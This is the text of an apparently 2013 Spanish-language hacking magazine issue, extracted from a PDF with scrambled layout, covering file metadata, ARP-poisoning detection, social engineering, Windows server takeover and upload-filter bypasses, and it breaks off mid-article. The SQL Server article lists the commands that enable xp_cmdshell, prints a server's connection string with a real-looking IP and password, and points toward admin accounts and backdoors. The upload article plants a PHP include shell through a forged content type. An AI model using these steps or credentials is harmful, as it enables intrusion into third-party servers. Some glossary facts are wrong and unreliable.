Vous êtes sur la page 1sur 48

AO 0

ISSUE# 02

Editorial
Una vez mas estamos de
vuelta con el segundo
numero de la revista,
la respuesta por parte
de ustedes los lectores
fue increble, el primer
tiraje se termino en
su totalidad, hemos
estado visitando una gran cantidad
de Universidades en la republica
Mexicana para promocionar la revista,
llevndoles charlas gratuitas con el
staff de HackingMexico, y tambin
organizando congresos y talleres de
aprendizaje extremos, ya contamos con
un staff mas amplio de conferencistas
reconocidos a nivel nacional e
internacional con los cuales estaremos
llevando los congresos a muchas
Universidades del pas.
Una acalaracion que me gustara hacer,
recibimos algunos comentarios en la
edicin anterior sobre las faltas de
ortografa que hay en la revista, esto
se debe a que se decidio conservar la
originalidad y escencia de cada autor,
nosotros no editamos ni censuramos
ningn contenido, tal y como nos envan

el articulo asi es publicado, creemos en


la libertad de expresin y es por eso
que cada autor es responsable de lo que
escribe. A fin de cuentas es una revista
de Hacking, no un diccionario Larousse.
Yo por ejemplo tengo un teclado
americano donde no tiene acentos, y pues
mis artculos saldrn obviamente sin
acentos a menos que el autocorrector
agregue algunos por ah.
Sigan al pendiente del twitter, del
Facebook, de la pagina, ya que ah
se van a enterar de donde estaremos
prximamente, para firmar revistas y
llevar talleres, gracias a toda la gente
que coolaboro con artculos ya que
gracias a ellos se forma la revista, no
olviden crear su blog gratuito en el
portal, para poder compartir sus cdigos
e investigaciones con todo el publico.
Tambien apartir de este numero incluimos
una seccin donde podras ofrecer tus
servicios como consultor, diseador,
programador, etc sin costo alguno,
puedes enviar tu anuncio de 20 palabras
mas tu nombre e informacin de contacto
al correo info@hackingmexico.mx

M.C Raul Robles A. CEO


Agradecimientos por su colaboracin en este numero
M4ku4z
Redpoint
Zolidk
Annika
C0dersoul
4Rc4n4
Torgnu
Torrescrack
Gamaliel
Chechesa
Gusanin Loco
Corrupted Byte
Death Angel
Zosemu

Xianur0
Molder Sombrero De Paja
Axxus
Mini Helios
Innovattia
Universidad Francisco I
Madero
Instituto Tecnologico De
Tehuacan
Casa Vecina
Reunion Ubuntista
Instituto De Estudios
Superiores De Oaxaca

Telmehub
Universidad Tecnologica
De San Juan Del Rio
Universidad Tecnologica
De Tecamachalco
Defcon Tijuana
Escuela Superior De
Computo
Universidad Anahuac
Instituto Tecnologico De
Tuxtepec
Campus Party

HackingMexico, Ao 1, No. 2, enero marzo 2013, es una publicacin bimestral editada por Editorial Althair, www.indautor.sep.gob.mx, infoinda@sep.gob.mx. Editor responsable: Raul
Robles Aviles. ISSN: en tramite, otorgado por el Instituto Nacional del Derecho de Autor, Licitud de Ttulo y contenido pendiente otorgado por la Comisin Calificadora de Publicaciones
y Revistas Ilustradas de la Secretara de Gobernacin. Permiso SEPOMEX No. 010203. Impresa por Alex Impresiones S. A. de C. V. Jose Revueltas 209 Del Benito Juarez, CP 03520 este
nmero se termin de imprimir el 30 de Enero de 2013 con un tiraje de 7,000 ejemplares. Las opiniones expresadas por los autores no necesariamente reflejan la postura del editor de la
publicacin. Queda estrictamente prohibida la reproduccin total o parcial de los contenidos e imgenes de la publicacin sin previa autorizacin del Instituto Nacional del Derecho de Autor.
No nos hacemos responsables por el mal uso de la informacion aqui expuesta, todo el material es con fines educativos y de investigacion, hackingmexico no incita a ningun tipo de vandalismo
virtual, cyberbullying, ni cyberamenzas. La informacion es para conocimiento de todos, para poder aprender como defenderse desde un punto de vista ofensivo.
Hackingmexico esta en contra de grupos de choque y activismo como Anonymous, nosotros somos un grupo de profesionales expertos en seguridad informatica que no apoyan este tipo
de actividades delictivas.

hax0rpedia

Hax0rpedia

Hambreado

Pwner

N00b

Hash

Profesor x
Novato

Lam0

Persona que quiere aparentar algo que


no es

Lammer

Variacion de lam0

Aquel que pwnea


Funcion que convierte una cadena de
longitud variable a una cadena de
longitud fija

Md5

Un tipo de encriptacion de 32 bits

Bitcoins

Wargame

Moneda descentralizada usada en la


deepweb

Pwn

Sitios underground que solo pueden


ser accesados via tor

Pruebas de hacking en un ambiente


controlado
Variacion del termino en ingles "own"
que significa apropiarse o ser dueo

Deepweb
Tor

Red de anonimato

www.hackingmexico.mx

contenido

CONTENTS PAGE
Algo ms all
de lo visible 06
[Deteccin /proteccin] [de/
contra] ataques ARP-Poisoning
(ARP-Spoofing) 08

Ingeniera social /
la mayor parte 12
Penetracin de
servidores windows 16

Hackeando
Correos
mito o
realidad 34

Identity
and Access
Management
Ayudando a la

organizacin

Bypassing
de Uploaders 20

WarDriving 24

CRACKEANDO
ACUNETIX
V82012 28

www.hackingmexico.mx

36

CISCO/
JUNIPER 38
Nxt Controler
Un troyano
Para divertirse 42

P U B L C A T E

C O N

informes

55

N O S O T R O S

10

68

88

09

i n f o @ h a c k i n g m e x i c o . m x

algo ms alla de lo visible

Algo m s
de lo all

visible
QUE SON LOS
METADATOS?

No existe definicin exacta de lo que


son los metadatos se puede decir que
son datos de otros datos, como sabemos un archivo es un bloque de informacin de un tamao determinado
gran parte del archivo est ocupado
por los datos, pero se reserva un espacio para los metadatos.

Archivo de PowerPoint donde se muestran metadatos

www.hackingmexico.mx

Documentos fotos y otros archivos contienen informacin oculta


sobre su origen informacin como: quien es el autor fecha de
creacin y modificacin programas usados para su creacin en
la fotografas tomadas por algunos mviles incluso contienen
coordenadas a esto se le llama metadatos pero

Los metadatos contenidos en un


archivo mp3 la etiqueta ID3 contendra: nombre de la cancin, autor,
gnero para las imgenes el archivo
EXIF sera el contendra los metadatos de fotografas, como el archivo
thumbnails que es la imagen en miniatura de la fotografa original.
La mayora de los editores de archivos pueden mostrar y manipular

la informacin de los metadatos en


dichos archivos.
Los metadatos pueden resultar
riesgosos para nuestra privacidad
como vemos en el archivo anterior
muestra el autor con que programa
fue creado fecha de edicin as como
ultima ves que fue modificado ruta de
guardado y dems.
Existen varios casos importantes donde los metadatos han servido
para la localizacin de delincuentes
ya que en las imgenes subidas a las
redes sociales contenan el geo posicionamiento GPS del lugar donde fue
tomada la fotografa.
Fotografa en la que se muestran
varios paquetes de droga, fue tomada

Figura 1

POr
Froylan Sedeo
@zolidk

algo ms alla de lo visible

con un iPhone en la cual se puede ver la posicin GPS mediante los metadatos EXIF. Existen varios casos curiosos en
la red de varias personas que se ha visto expuesta su privacidad por los metadatos. (Figura 1)
Algunos programas para analizarlos metadatos son
FOCA, EXIF, IPTC, XMP y muchos ms. As como creepy
que nos permite localizar imgenes de usuarios de twitter
para examinar los metadatos y obtener la localizacin donde
fue tomada dicha imagen. (Figura 2,3,4)

Te robaron tu cmara fotogrfica?

Figura 2

Archivo mp3 donde se muestran sus metadatos

Los metadatos nos pueden ser til para hacer


un ataque de malware dirigido ya que conociendo informacin como autor empresa sistema operativo y software con que fue creado podramos acertar ms en nuestro ataque.

Figura 4

Existen varios aplicaciones para eliminar los


metadatos como:
OOMetaExtractor (Limpiar
documentos OpenOffice o LibreOffice (.odt)).
JPEG y PNG Stripper (Limpiar
metadatos de imgenes de formato JPEG
y PNG).
MetaShield Protector y Metadata
Extractor (Limpiar documentos ofimticos:
MS Office de la versin 97 a la 2007 y
OpenOffice).

Figura 3

Existe una pgina en la red que ofrece un servicio que permite localizar tu cmara o por lo menos tratar, esto lo hace analizando los
metadatos de las fotogrficas se sube una imagen que haya sido
tomada por tu cmara sin modificar y se analiza el archivo EXIF
el cual contiene el nmero de serie y otros datos nicos de la cmara, busca en su base de datos y tratara de encontrar si existe alguna
otra imagen en la red con los mismos datos si tu cmara fue robada
fue usada y subieron imgenes a la red seguramente aparecer en
la plataforma aqu el link de la pgina por si quieres probar http://
www.stolencamerafinder.com/

www.hackingmexico.mx

deteccin / proteccin

[Deteccin/p
POr
Jess Gmez (ZoSemU?)
zosemu@gmail.com

En este articulo me
permitir explayarme con la
teora porque creo que es
necesaria para comprender
a fondo que es lo que pasa
en este tipo de ataques, la
principal razn de hacerlo
as y no de otra manera es
que he visto que muchos que
dicen ser huaxors lite,
no tienen idea de cmo
funciona realmente esto y
luego dicen cosas que no
son ciertas.

Figura 1

ara este ejemplo usar un equipo con GNU/


Linux para realizar el ataque y aunque sera ms
divertido usar la distro Bactrack como vctima,
no lo har porque para fines prcticos la gente
tiene normalmente instalado Windows, as que la vctima
ser un Ventanucos 7 Ultimate x64. Manos a la obra, pero
primero, s, no crean que lo haba olvidado la teora XD!!!
Address Resolution Protocol (Protocolo de Resolucin de Direcciones), es el protocolo encargado de rela-

www.hackingmexico.mx

[de/co

ataq
ARP-Poi
(

A R P -

S p

cionar la direccin fsica de nuestros dispositivos (MAC)


con la IP que tenemos asignados dentro de una red. Cabe
sealar que es un protocolo de capa dos (enlace de datos),
su funcionamiento est documentado en el RFC 826 y
funciona de la siguiente manera:
Existe una tabla de relacin IP-MAC en nuestro equipo, cuando tenemos que enviar un paquete a determinada
IP, antes se debe averiguar cual es la direccin MAC a la
que corresponde dicha IP --porqu?..., porque en caso

deteccin / proteccin

proteccin]

ontra]

ques
isoning

o o f i n g )
contrario correramos el riesgo de que nuestra informacin terminar en casa del vecino XD!!!-- en caso de no
encontrar dicha MAC en nuestra preciosa tabla se deber
realizar una consulta para averiguar cual es la direccin
MAC correspondiente a dicha IP, esto se conoce como
ARP REQUEST, debido a la limitante de la capa en la
que opera, este tipo de consultas en realidad se realizan
a la direccin del Broadcast (FF:FF:FF:FF:FF:FF) para
cada IP a consultar, pero normalmente comienzan con la
IP de la que se desea averiguar la MAC, esto con el fin de
reducir la saturacin de trafico; por otra parte el equipo al
que le estamos enviando el REQUEST recibe el paquete
y debe actuar en consecuencia, lo que hace envindonos
un paquete del tipo ARP REPLY. Para que ilustrar lo anterior, voy a mostrar a detalle con una captura de Wireshark. (Figura 1)
Es importante que podamos interpretar lo que significa
la informacin que tenemos para poder encontrar una forma
de hacer que se comporte de otro modo, viendo al desnudo
nuestro ARP REQUEST podemos darnos una idea de como
funciona entonces el ARP Poisoning.
En la estructura observamos que el paquete observamos
que esta compuesto por:
1. Capa de transmisin Ethernet
La direccin fsica de destino en este caso el broadcast --6
bytes(ff ff ff ff ff ff)
La direccin fsica de origen --6 bytes (xx xx xx 71 cc e1)
El tipo de protocolo --2 bytes (08 06)

2. Datos del paquete Ethernet


Espacio de direccin de hardware --2 bytes (00 01)
Espacio de direccin de protocolo --2 bytes (08 00)
Largo en bytes de cada direccin de hardware -- 1 byte (06)
Largo en bytes de cada direccin de protocolo -- 1 byte (04)
Opcode (REQUEST/REPLY) -- 2 bytes (00 01)
Direccin de hardware del emisor del paquete -- 6 bytes
(xx xx xx 71 cc e1)
Direccin del protocolo del emisor del paquete -- 4 bytes
(c0 a8 01 fe)
Direccin del hardware del destinatario (*si se sabe) -- 6
bytes (ff ff ff ff ff ff)
Direccin de protocolo del destinatario -- 4 bytes (c0 a8 01 02)
Los bytes que he sealado en gris corresponden a una cantidad variable de bytes. Por lo dems, la estructura ser necesariamente la misma para un ARP REPLY. Y como resulta
evidente los bytes 21-22 son los que determinan de que tipo
se trata 00 01 para un REQUEST y 00 02 para un REPLY.
Ahora veamos que hace nuestro equipo para responder a
esa solicitud: (Figura 2)
Pongamos claridad en esto, como ya vimos el protocolo
hace una consulta a su tabla local, en caso de tener la respuesta
resuelve y el paquete se enva, en caso de no existir se pregunta,
si nadie responde se cancela el envo, si alguien responde se
guarda la direccin en la tabla y se le manda el paquete.
Ahora partiendo del hecho de que existen dos tipos de
entradas en la tabla local dinmicas y estticas--, surgen
varias preguntas y posibilidades para el ataque, qu pasara
www.hackingmexico.mx

Figura 2

deteccin / proteccin

si nuestra vctima tuviera una entrada esttica al router?, fin


del juego --porque aunque nosotros enviemos 1,000,000 de
ARP REPLYs diciendo lo contrario, nuestra vctima los ignorara por completo, porque ya no genera ARP REQUESTs
(al menos no para esa IP) ohhhhhh!!. Entonces ya tenemos
la primer lnea de defensa una entrada esttica en nuestra
tabla ARP lo que conseguimos haciendo uso del comando:

asignarle una IP valida y luego hacer el registro en todos y


cada uno de los equipos que necesiten comunicarse con este
nuevo equipo, bla bla bla.
Por lo tanto nuestra tarea como atacantes es hacerle pensar al router que nosotros somos nuestra vctima y a nuestra
vctima que nosotros somos el router, cmo lo conseguimos:

arp s IP_del_Router MAC_del_Router


Ok, ya sabemos cmo defendernos pero, y si no tuviramos la direccin correcta del router?, aqu hay dos posibilidades si estuviramos bajo ataque al momento de hacer
la consulta podramos pensar erradamente que la direccin
de nuestro router es 00:11:22:33:44:55 (direccin MAC de
nuestro atacante) y al momento de agregar la entrada esttica, facilitaramos por completo el ataque, es ms nos estaramos atacando nosotros mismos, porque si nuestro atacante
se desconecta nos dejar con una hermosa Denegacin de
Servios (DoS) al no existir a donde enviar los paquetes. De
hecho esa es una forma muy sencilla y prctica de dejar a
alguien sin internet y sin que se d cuenta mujajajajajajaja!!!
De lo que hemos visto hasta ahora, podemos inferir que
para que exista un ARP Spoof como tal, debe existir un ARP
Poisoning, en caso contrario no existe porque si creamos una
entrada esttica en las tablas ARP, ya no se generan ARP
REQUESTs y por otra parte si spoofeamos nuestra IP, MAC
o ambas, a pesar de eso, se generan ARP REPLYs perfectamente validos aunque con datos falsos. Entonces, dnde viene el spoofeo a nivel ARP?, y, porqu se necesita el
envenenamiento (Poisoning)?, ya vimos en la idea general
del protocolo que todo depende de unas tablas y esas tablas
tiene n dos tipos de entradas, normalmente las entradas son
dinmicas y por lo tanto tienen que tener un tiempo de vida
--esto es porque de lo contrario tendra que haber alguien
encargado todo el tiempo de decidir que IP asigno a los nuevos equipos que se conecten a la red, conseguir su MAC,

10

www.hackingmexico.mx

Al principio debemos enviar un ARP REQUEST tanto a


nuestra vctima como al router a fin de obtener sus direcciones MAC reales, una vez obtenida esa informacin debemos
generar paquetes del tipo ARP REPLY malformados (spoof)
y mandarlos a ambos, esto es lo que hace la aplicacin
arpspoof de la suite de herramientas dsniff.
Cmo es entonces que quedamos en medio, bueno eso
tiene que ver con el tiempo de vida de la informacin en
las tablas, como lo haba mencionado antes, para que la red
mantenga coherencia, se debe saber a quien enviar un paquete, sin embargo sera imposible para un usuario normal,
recordar direcciones MAC, IPs asignadas, etc, etc. En consecuencia las tablas deben renovarse y por ello es que podemos engaarlas, ahora la cosa es que no sabemos en que
momento nuestra vctima o nuestro router van a solicitar esa
informacin as que nuestra querida herramienta debe enviar
cientos o miles de paquetes a fin de ganar la carrera contra
las respuestas reales y es por esto nios que solo deben hacer
el ataque de arpspoof en un sentido y no en ambos como
muchos creen.
Porque como buenos hackers ya habrn inducido seguramente que si no existe la velocidad adecuada para enviar esta
informacin, es decir si generamos ms respuestas que preguntas, s, tambin se producir una denegacin de servicios.
Luego de toda esta aburrida teora les contar que hay
una herramienta que les permite simplificar todo este trabajo

deteccin / proteccin

Figura 3
Figura 4

y como no soy lite la programe en


VB 6, seguro que muchos lites la pudieron haber programado en C o Delphi, pero, no se les ocurri antes y
en esto tengo merito jeje.
Todo surgi por un reto puesto que
si exista una herramienta que lo detectaba, pero siempre y cuando no te estuvieran atacando al momento de ejecutarla, es decir que si alguien te ganaba la
carrera de lanzar el ataque antes de que
tu equipo cargar, estabas en las mismas, bien como mencion antes para
que el ataque funcione dependemos de
las tablas, como es bien sabido por todos el sistema de los Ventanucos es muy
dado a pasarse por el forro todos los estndares, as que en cuestin de ARP
no iba a ser la excepcin y las tablas se
renuevan a un ritmo escandaloso mientras estamos bajo un ataque, esto ocurre
porque al encontrarse una nueva entrada actualiza las dems, entonces si nos
estn atacando el tiempo de vida de esas
tablas es menor, lo que juega un papel
importante para nuestro atacante, sin
embargo es aqu en donde vino la luz
Si estamos bajo un ataque MITM
(Man In The Middle) como lo he explicado, nuestro atacante deber adems
de engaarnos suplantando al router,
resolver todas nuestras conexiones, es
decir, se convierte en el router y as en el
inter, escucha nuestro trfico ohhhhhh,
entonces la mejor manera de joderlo es
poner a prueba su capacidad de resolver nuestras peticiones errneas, tal y
como lo hara el router, qu, porqu?,
sencillo si l no puede resolver, entonces deber pedir ayuda --a quin?-- al
router y es precisamente durante este
tiempo que tendr que bajar la guardia y
mostrar su verdadera cara, es decir conseguiremos obtener dos IPs diferentes
en nuestra tabla ARP pero con la misma
MAC y as es como lo atrapamos, an,
cuando ya estemos bajo su ataque. Para
eso solo tiramos un ping a un dominio
inexistente pero que pueda ser valido
por ejemplo google.com.x, facebook.con, cualquiera sirve para atrapar
a nuestro pequeo mentiroso.
Bien ya solo me resta agregar un par
de capturas de pantalla en la primera se
muestra el cambio sufrido luego del ataque y en la segunda el resultado de nuestra
pequea trampa jejeje. (Figura 3, 4)

www.hackingmexico.mx

11

ingeniera social

eguramente habrs consultado a alguien, o bien,


alguien te ha consultado para conseguir una clave
de un correo, una cuenta de Facebook, de Messenger, y un largo etctera. Lo ms raro de todo,
es que casi siempre haba que obtener una clave de alguien
que ni siquiera conoce la persona que se supone va a sacar
la clave, y se asume que esa persona va a aprovecharse de

una vulnerabilidad del sistema para hackear el servicio y obtener la clave (por ejemplo, la famosa creencia de hackear
Hotmail). Para empezar, las claves van encriptadas en los
principales servicios y slo pueden cambiarse, no pueden
verse o saberse partiendo del hash.
En Hotmail, nos encontrbamos con la famosa pregunta secreta, posteriormente agregaron preguntas ms extra-

Ing
soc
as, como el cdigo postal donde vives (a veces ni nosotros
lo sabemos), por lo que no poda ignorarse que la cuenta
pertenece a una persona de quien debe tenerse informacin.
Actualmente, la mayora de las empresas, sin importar su tamao, an no se toman muy en serio el asunto de
que la seguridad informtica es tambin responsabilidad

12

www.hackingmexico.mx

de los involucrados: los usuarios, los directivos y, sobre


todo, de todos los trabajadores de la compaa. Casi siempre saben algo que es muy delicado respecto de alguien
o de la organizacin donde trabajan, si las personas estn
felices no hay problema, pero si tienen un descontento y
son personas que no son muy respetuosas de la informa-

ingeniera social

cin, es posible que quieran sacar provecho del conocimiento que poseen.
Es aqu donde hay alguien que sabe algo que nosotros quiz
no, y es posible que nos interese saberlo. Se imaginan conocer
por adelantado un gran hallazgo en una compaa, lo suficientemente importante como para saber que sus acciones subirn
y que si compras ahora ganaras mucho dinero? Sin duda es

informacin privilegiada, es posible hacer dinero de esa forma,


pero ms all de eso, nos referimos al valor de la informacin.
Como bien pudo ser informacin por adelantado, pudo
haber sido lo contrario, nos dicen que algo sali muy mal
para que vendamos las acciones y dejemos de ganar dinero
(o lo perdamos); as que esto puede ser un arma de doble
filo, depender de la veracidad de la informacin.

geniera
la mayor
cial parte

POr Marco Antonio Camarena / Ingeniero en Computacin, UNAM


@Chechesa / fb.me / Chechesa

Para hackear a una persona, generalmente es esa misma


persona la que debe darnos su informacin, por qu ella misma? Porque podra ser informacin que nadie ms conozca.
Quiz el actor preferido, el nombre de la primer mascota o las
placas del primer auto. Son cosas que no suelen salir en una
conversacin y que si nos hacemos a la tarea de hacer una lista

de las preguntas y pedir a alguien que las responda, muy probablemente no lo haga y se d cuenta del truco.
Pongamos un ejemplo de ingeniera social: pasas un
chismgrafo (es una lista de preguntas que suele jugarse
contestando, para distraerse o despejarse, o simplemente
divertirte leyendo las respuestas de otros) con esas pre-

www.hackingmexico.mx

13

ingeniera social

14

guntas y adornas con la frase Contesta las siguientes


preguntas despus de leer las respuestas de tu amigo, para
que te ras de las respuestas y tengas una sonrisa todo el
da, pasas el chismgrafo y contestan las preguntas que
necesitabas Listo.
Otro ejemplo en el que seas un habilidoso conversador (con muy buena memoria, por cierto) y comiences a
cambiar de temas rpidamente te imaginas? Una conver-

sacin es de lo ms normal del mundo, y mientras ms


temas hables, generalmente es ms entretenida una conversacin. Sin duda obtendrs datos sensibles, que podran ser contraseas o respuestas secretas potenciales.
Cul es tu comida favorita? Sola encontrar que muchos
respondan mole o chile Listo.
El espionaje industrial generalmente es llevado a
cabo por personas que actan como personas! No detrs

de un ordenador, sino a un lado de la persona con acceso


a toda la informacin sensible de la organizacin. Los sistemas computacionales rara vez fallan, los datos pueden
ser encriptados y slo la persona que tenga la clave podra ver esos datos, de modo que nadie ms pueda saber
qu contiene, y tratar de adivinar una (supongamos) muy
robusta contrasea no sera viable o recomendable, pero

ofrecerle a alguien guardar una copia extra de la contrasea, por seguridad y garantizar que est en buenas
manos Listo.
Para conocer personas tambin funciona. Las chicas estn ms familiarizadas que los chicos con la ingeniera social; por ejemplo, si ests hablando con una chica, ella podr
leer tu lenguaje corporal fcilmente. Las palabras podran

www.hackingmexico.mx

ingeniera social

ser importantes, pero lo que dice tu cuerpo lo es ms. Si


muestras ansiedad, tiemblas, tartamudeas o res nerviosamente, ellas lo vern de inmediato. En cambio, los chicos se
fijan ms en lo que dicen sus palabras, y a menudo no recibirn el mensaje completo si no son buenos observadores (o
si estn nerviosos).
Si eres chica y quieres acercarte a un chico, una buena forma es preguntarle algo, si adems quieres hacerle una

prueba para su intelecto/rea de conocimientos, puedes hacer la pregunta un poco ms difcil.


Si eres chico y quieres acercarte a una chica, en lo que
menos debes pensar en lo que podra salir mal, s dinmico y no te portes hiperactivo (eso asusta la mayora de
las veces). Como depende ms de cmo dices las cosas, si
tu cuerpo habla adecuadamente, la conversacin ser ms
fluida y divertida.

Un tip de convencimiento: el cerebro analiza primero


las opciones disponibles. Preguntar algo como quieres
tomar un caf? tiene S y No como opciones, pero
una pregunta como cul es tu refresco favorito? o te
gusta ms el caf o el refresco? no tiene un no por respuesta, y ests provocando que a la otra persona se le
antoje algo de beber Listo.

Recuerda que la ingeniera social puede ser usada para


el mal, pero tambin puede salvar vidas y evitar otras tragedias al ofrecerle confianza a quien te otorga la informacin
y respetar esa confianza, quiz aportando de forma benfica, quiz simplemente guardando el secreto. Un gran poder
conlleva una gran responsabilidad, y hay que saber respetar
la privacidad de los dems y ser sincero.

www.hackingmexico.mx

15

penetracin de servidores windows

Penetracin
de

16

servidores
windows

www.hackingmexico.mx

penetracin de servidores windows

ola soy Omar Ibaez (CorruptedByte), en esta ocacion mostrare una manera de penetrar servidores windows o mas bien como escalar privilegios
mediante SQL Server 2008. Muchas veces nos topamos con vulnerabilidades como arbitrary file download, transversal directory, local file
inclusion, oracle padding attack u otras y esto solo nos da acceso a codigo fuente o
archivos de configuracin donde podemos encontrar el usuario y contrasea de SQL
Server (web.config) pero con esto muchas veces solo tenemos acceso a la base de datos
donde encontramos usuarios, contraseas o muchas veces solo informacion inutil, pero
que tal si pudieramos tomar contro total del servidor con tan solo las credenciales de
SQL Server, esto es lo que mostrare en el transcurso de este articulo.

STORED PROCEDURES (PROCEDIMIENTOS


ALMACENADOS)
Como lo mencione anteriormente nos enfocaremos en la
penetracion de servidores windows mediante SQL Server y
como sabemos Microsoft usa Transact-SQL (T-SQL) en su
motor de bases de datos, T-SQL como muchos otros motores
de bases de datos tiene stored procedures que son programas
almacenados fisicamente en las bases de datos del motor, en
el caso de SQL Server de Microsoft las bases de datos del
motor son: master, model, msdb y tempdb.

XP_CMDSHELL
Uno de los stored procedures que tiene SQL Server es xp_
cmdshell, xp_cmdshell nos proporciona una shell de comandos directamente en el sistema con privilegios normalmente
administrativos asi que ya se podran imaginar que tanto podemos hacer con este stored procedure.

REESTRICCION DE SQL SERVER EN


VERSIONES RECIENTES
Despues de SQL Server 2005 este stored procedure biene

desactivado por defecto debido a su alto riesgo, pero una


vez que hayamos conseguido las credenciales de SQL Server podemos activarlo, esta vez no me enfocare en sacar las
credenciales ya que como comente esto se puede obtener
de el archivo web.config si es un servidor web programado
con .NET que es el archivo donde viene la configuracion y
la parte donde se encuentran las credenciales de SQL es el
ConnectionString y luce asi (esta es la parte de la conexin,
el archivo es mas grande):
<configuration>
<appSettings>
<add key=ClearSaleActive value=true/>
<addkey=ConnectionStringvalue=serv
er=200.150.158.122; Database=lojavirus; User Id=virus;
Password=3jig%o9!; Connection Timeout=20000/>
</appSettings>
</configuration>
El anterior es un servidor windows real y al dia de hoy el
servidor funciona correctamente con esas credenciales, esto
lo obtube con Oracle Padding Attack aunque pueden usar
cualquier otro metodo de penetracion incluso bruteforcing.
www.hackingmexico.mx

17

penetracin de servidores windows

HABILITANDO XP_
CMDSHELL
Regresando al tema del xp_cmdshell,
como les comente desde SQL Server
2005 biene desactivado, pero se activa ejecutando las siguientes lineas en
un query normal en cualquier base de
datos del sistema:
Linea para habilitar las opciones
avanzadas
EXEC sp_configure show advanced options, 1
GO
Linea para actualizar la configuracion
RECONFIGURE
GO
Linea para habilitar el stored procedure xp_cmdshell
EXEC sp_configure xp_cmdshell, 1
GO
Linea para actualizar la configuracion
RECONFIGURE GO
Con las anteriores lineas abremos activado el stored procedure de manera
completa, obviamente para esto se tiene
que acceder a ala base de datos con el
usuario sa (usuario default adminsitrativo de SQL Server) o algun otro
usuario adminsitrativo de SQL.

TOMANDO EL CONTROL
TOTAL DEL SERVIDOR CON
XP_CMDSHELL
Una vez que tenemos activado el stored procedure tenemos el control total
del servidor ya que podemos ejecutar
cualquier comando y se hace de la siguiente manera:
EXEC master.dbo.xp_cmdshell
comando a ejecutat
Ejemplo:
EXEC master.dbo.xp_cmdshell
DIR C:\ (Figura 1)

18

www.hackingmexico.mx

Ejecutando el comando nos devolvera el output como si fuera una tabla


y bueno una vez que comprovemos
que podemos hacer la ejecucion de
comandos en el servidor remoto con
SQL Server solo tenemos que echar a
volar la imaginacion, si no tienes experiencia en explotacion de servidores windows y sus comandos es mejor
que aprendas a usar bien el sistema
operativo pero tambien puedes utilizar una herramienta llamada MSS Exploiter de R00TW0RM TEAM (foro
de 1377day.com) la cual nos permite
hacer lo siguiente:
-Iniciar shell
-Crear usuario con permisos
administrativos
-Habilitar escritorio remoto
-Deshabilitar escritorio remoto
-Conectar al escritorio remoto
-SQL Manager
-Matar procesos
-Borrar todos los sitios web en el
servidor
-Iniciar, detener y reiniciar
servidor web (IIS)
-Apagar equipo

Esta aplicacin es demaciado util ya


que nos brinda una shell en el equipo
sin necesidad de hacer la ejecucion de
toda la linea en el SQL Server (EXEC
master.dbo.xp_cmdshell comando)
ademas nos agrega un usuario con
permisos de adminsitrador y nos habilita el escritorio remoto, lo mejos es
que es desde linux y no necesitas ahcer la instalacion de SQL Server.

Para instalar MSS Exploiter pueden


bajarlo de http://corruptedbyte.org.
mx/blog/mssexploiter ademas necesitan instalar unas librerias (esta escrito
en python y solo corre en linux).
MSS Exploiter nos brinda 2 opciones, conectarse al servidor windows con las credenciales o en el caso
de no tenerlas nos brinda la opcion de
realizar un ataque de fuerza bruta.

Si nos loguamos directamente con


las credenciales nos tira el siguiente
menu donde introduciremos IP, usuario y contrasea:

Con esto podemos acceder a una


shell u a otras opciones, las 2 opciones que mas nos facilitaran el
trabajo es la de agregar un usuario
con permisos administrativos y la de
habilitar el escritorio remoto, para
esto solo ejecutamos la 2da opcion
e introducimos el nuevo usuario y la
nueva contrasea:

Por ultimo ya solo nos quedaria ingresar a el escritorio remoto ejecutando


la 5ta opcion:

Con esto basicamente el servidor es


nuestro y podremos instalar un backdoor para tener una conexin persistente o podemos hacer cualquier otra
cosa que se nos ocurra.

penetracin de servidores windows

MSS EXPLOITER TOOL

Tomen en cuenta que muchas cosas


podrian variar e incluso negarles el
acceso a activar el stored procedure ya
que depende mucho de la configuracion que le dan al servidor, pero la funciona con la configuracion tipica que
le dan casi todas las empresas, ami me
ha funcionado en muchos servidores y
es por eso que escribi MSS Exploiter
ya que me ahorra trabajo ala hora de
explotar servidores windows de esta
manera. Si el sitio de descarga no funciona para cuando esten leyendo esto o
necesitan ayuda con el script o explotacion de servidores window con SQL
Server pueden mandarme un correo a:
CorruptedByte@programmer.net.

Ahora podremos acceder a las opciones de MSS Exploiter como se muestra a continuacion:

www.hackingmexico.mx

19

bypassing de uploaders

Bypassing de Uploaders

ntes que nada un saludo a toda la old school, en


especial a mi buen amigo megabyte.
En este articulo les enseare algunos
tecnicas (no todas) para bypassear algunos
uploaders que usan metodos para filtrar los archivos que
son subidos.
1.- BYPASSEANDO UPLOADS
QUE USAN [TYPE]
Cdigo:
<?php
$archivo = $HTTP_POST_FILES[archivo];
$tipo = $archivo[type];
if (!(strpos($tipo, jpeg))) {
echoNo aceptamos ese tipo de archivos;
}else{
if (move_uploaded_file($archivo[tmp_name],
$archivo[name])){
echo Archivo subido correctamente <a href=.$arc
hivo[name].>Archivo</a>;
}else{
echo No se puede sibir;
}
}
?>
El cdigo vulnerable esta situado en: $archivo[type]; Ya
que type es extrado de los headers que enva el navegador
al subir un archivo, Por ejemplo este es el contenido de
postque enva mi firefox al subir una imagen a ese upload:
Cdigo:
-----------------------------24464570528145\r\n
Content-Disposition: form-data; name=archivo;
filename=imagen.jpg\r\n
Content-Type: image/jpeg\r\n
\r\n
BMV\x80\x0e
ANALIZANDO LNEA X LNEA
Cdigo:
Content-Disposition: form-data; name=archivo;
filename=foto.jpg\r\n
Se especifica el nombre del archivo que se esta subiendo al
upload: foto.jpg
Cdigo:
Content-Type: image/jpeg\r\n

20

www.hackingmexico.mx

por
Braulio Miguel Suarez Urquijo
(Red-Point)
r3d-p0int@hotmail.com

Ahi se especifica de que tipo es el archivo.


En las siguientes lineas se dice cual es el contenido del
archivo.Si querramos subir un archivo .php al servidor
solamente tendramos que mandar esta peticin:
Cdigo:
----------------------------24464570528145\r\n
Content-Disposition: formdata; name=archivo;
filename=h4x0r1337.
php\r\n
Content-Type: image/
jpeg\r\n
\r\n
<?php include($_
GET[c]); ?>
Si mandaramos
esa peticin al
anterior upload
conseguiramos
subir mishell.
php con xito,
para modificar
las cabeceras que
manda tu navegador
puedes instalar este
complementoen tu
firefox:
https://addons.mozilla.org/esES/firefox/addon/3829
Ese complemento capturara todas las
peticiones que envi tu navegador, solo
tienes que darle a repetir para editarlas o buscar un
software llamado achilles es muy viejo pero aun sirve..
2.- UPLOADERS QUE VERIFICAN LA EXTENSION
DEL ARCHIVO
Cdigo:
<?php
$archivo = $HTTP_POST_FILES[archivo];
$nombre = $archivo[name];
$explod = explode(., $nombre);
$ext = $exploded[1];
